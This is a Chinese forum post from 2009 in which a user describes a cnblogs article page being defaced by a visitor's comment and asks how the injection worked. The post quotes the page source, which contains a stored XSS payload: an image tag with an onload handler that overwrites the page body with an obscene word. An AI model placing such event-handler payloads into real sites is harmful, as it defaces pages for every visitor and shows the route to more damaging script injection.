博客园那篇文章，怎么被“注入”的？

，早上一起来，到园子了一看头条《为什么用博客园，不自己做网站，为什么程序不加密·····》好像是这个文章。
进去后就弹个提示框···网页内容是“FUCK”··就没了。

我想这是不是被人注入了啊？

看了下源代码找到了这么一段

<a href="#1644806">#9楼</a><a name="1644806" id="comment_anchor_1644806"></a>
     &nbsp;&nbsp;<a onclick="ReplyComment(&quot;xxxxxxss&quot;,1644806,&quot;&quot;)" href="/jirigala/archive/2009/09/13/1565643.html#commentform">回复</a>&nbsp;&nbsp;<a onclick="QuoteComment(1644806,&quot;&quot;)" href="/jirigala/archive/2009/09/13/1565643.html#commentform">引用</a>&nbsp;&nbsp;<a id="Comments1_CommentList_ctl08_DeleteLink" href="javascript:__doPostBack('Comments1$CommentList$ctl08$DeleteLink','')"></a>&nbsp;&nbsp;<a id="Comments1_CommentList_ctl08_EditLink"></a>
    </h2>
    <span id="comment_body_1644806"><a href='http://www.hao123.com/logo.gif' onload=document.getElementsByTagName('body')[0].innerHTML='FUCK' a='logo.gif' target='_blank'><img src='http://www.hao123.com/logo.gif' onload=document.getElementsByTagName('body')[0].innerHTML='FUCK' a='logo.gif' border=0 onload='javascript:if(this.width>500) this.width=500'/></a></span>
    <div class="postfoot">
     2009-09-13 01:07 | <a id="Comments1_CommentList_ctl08_NameLink" rel="nofllow" href="http://www.cnitblog.com/r.aspx?url=http://www.o.nc" target="_blank">xxxxxxss[未注册用户]</a>

我想是不是在回帖时注入了这样的代码啊？

具体代码是怎样的啊？